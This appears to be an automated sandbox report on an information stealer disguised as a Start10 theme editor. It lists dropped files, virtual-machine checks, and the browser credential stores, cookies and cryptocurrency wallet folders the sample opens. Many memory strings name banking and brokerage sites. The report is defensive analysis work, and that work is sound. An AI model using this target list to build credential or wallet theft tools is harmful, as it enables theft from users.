Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-V27GE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-TP3J2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.QualityTools.ExecutionCommon.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-2TQSG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-HJD82.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\PresentationBuildTasks.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\wintoast.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.ProgramSynthesis.Transformation.Tree.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\edit_test.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\IEAWSDC.DLL (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-PU8TF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\kvno.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-J4PLL.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: chrome.exe, 00000008.00000002.2604287990.000031B802900000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: chrome.exe, 00000008.00000002.2601946438.000031B802510000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse
Source: is-RRJFN.tmp.3.dr	Binary or memory string: http://www.vmware.com/0
Source: is-RRJFN.tmp.3.dr	Binary or memory string: d:\build\ob\bora-1188790\generic\krb5-1.11.3\src\vmware\src\include\k5-thread.hres == WAIT_OBJECT_0d:\build\ob\bora-1188790\generic\krb5-1.11.3\src\vmware\src\include\k5-thread.hd:\build\ob\bora-1188790\generic\krb5-1.11.3\src\vmware\src\include\k5-thread.h(m)->h == INVALID_HANDLE_VALUEUsage: %s [-e] [-V] [[-c] [-l] [-A] [-d] [-f] [-s] [-a [-n]]] [-k [-t] [-K]] [name]
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: lem.tmp, 00000001.00000002.2055133681.0000000000618000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E,0W
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: is-RRJFN.tmp.3.dr	Binary or memory string: GetSystemTimeAsFileTimeKERNEL32.dlld:\build\ob\bora-1188790\generic\krb5-1.11.3\src\vmware\src\include\k5-thread.hres != WAIT_TIMEOUTm->is_locked == 0 d:\build\ob\bora-1188790\generic\krb5-1.11.3\src\vmware\src\include\k5-thread.hres != WAIT_ABANDONED
Source: msedge.exe, 0000000C.00000003.2636297995.00005750024B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: is-RRJFN.tmp.3.dr	Binary or memory string: VMware, Inc.0
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: chrome.exe, 00000008.00000002.2591417886.000001BB47EC8000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2654030762.000001F00AC46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: chrome.exe, 00000008.00000002.2601607989.000031B8024A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=cb70a21c-b93e-4832-8c11-505134dbc666
Source: is-RRJFN.tmp.3.dr	Binary or memory string: VMware, Inc.1>0<
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: chrome.exe, 00000008.00000002.2592663594.000001BB4C940000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_*
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: lem.tmp, 00000001.00000002.2055133681.0000000000618000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Z,
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.0000000004397000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA0BA9 mov eax, dword ptr fs:[00000030h]	6_2_00BA0BA9
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA05E9 mov edx, dword ptr fs:[00000030h]	6_2_00BA05E9
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA11F8 mov eax, dword ptr fs:[00000030h]	6_2_00BA11F8
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA11F9 mov eax, dword ptr fs:[00000030h]	6_2_00BA11F9
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA1BE7 mov eax, dword ptr fs:[00000030h]	6_2_00BA1BE7
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA0F59 mov eax, dword ptr fs:[00000030h]	6_2_00BA0F59

Source: Start10ThemeEdit.exe, Start10ThemeEdit.exe, 00000006.00000002.3140521950.0000000000988000.00000002.00000001.01000000.0000000E.sdmp, Start10ThemeEdit.exe, 00000006.00000000.2304596385.0000000000988000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: Shell_TrayWnd
Source: Start10ThemeEdit.exe, 00000006.00000002.3140521950.0000000000988000.00000002.00000001.01000000.0000000E.sdmp, Start10ThemeEdit.exe, 00000006.00000000.2304596385.0000000000988000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: Normal Blend ModeSRC ATOPSRC ATOP onto greyscale destination only)SRC ATOP onto colour destination onlyDST ATOPMultiply Blend onto greyscale destination onlyMultiply Blend onto colour destination onlyMultiply Blend onto colour destination only with automaskMultiply Blend onto greyscale destination only with automaskMultiply BlendMultiply Blend with automaskPlus BlendPlus Blend with automaskScreen BlendScreen Blend with automaskScreen Blend onto colour destination only with automaskScreen Blend onto greyscale destination only with automaskOverlay BlendOverlay Blend with automaskOverlay Blend onto colour destination only with automaskOverlay Blend onto greyscale destination only with automaskOverlay blend apart from solidDarken Blend ModeDarken Blend Mode with automaskLighten Blend ModeLighten Blend Mode with automaskHard lightHard light with automaskDifference Blend ModeDifference Blend Mode with automaskExclusion Blend ModeExclusion Blend Mode with automaskStardock Start10 theme editor - \Stardock\Start100.Start8ThemeStart8.iniLastEditSkinStart8SkinAuthorStart8 theme files\|.Start8Theme\|\|.Start8Theme\.Start8ThemeOpen existing theme...Shell_TrayWndSTART8_RELOADPADDING\defs.iniShiftFilterRequiredBase Layer - (Additional text layer - (Additional image layer )Description3Description2 Text Layer ** Image Layer ImageAlphaMode ::L\Start10\Zipped".S8Theme\zip.exe" .* -9 -X -jopenImage files\|.png\|\|.png\Start10\Select image...editText::T1ExistsAre you sure you want to delete the layer?Delete layer?Unable to find theme file to openNo theme to open

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: LocalAlloc,GetLocaleInfoA,LocalFree,		6_3_02A1DE1C
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: GetModuleHandleW,GetProcAddress,RtlEncodePointer,RtlDecodePointer,GetLocaleInfoW,		6_2_0084D1BA

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000006.00000003.3139258337.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2451742401.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2451630556.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2465580145.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3139766506.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Start10ThemeEdit.exe PID: 6488, type: MEMORYSTR

Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \MultiDoge\
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
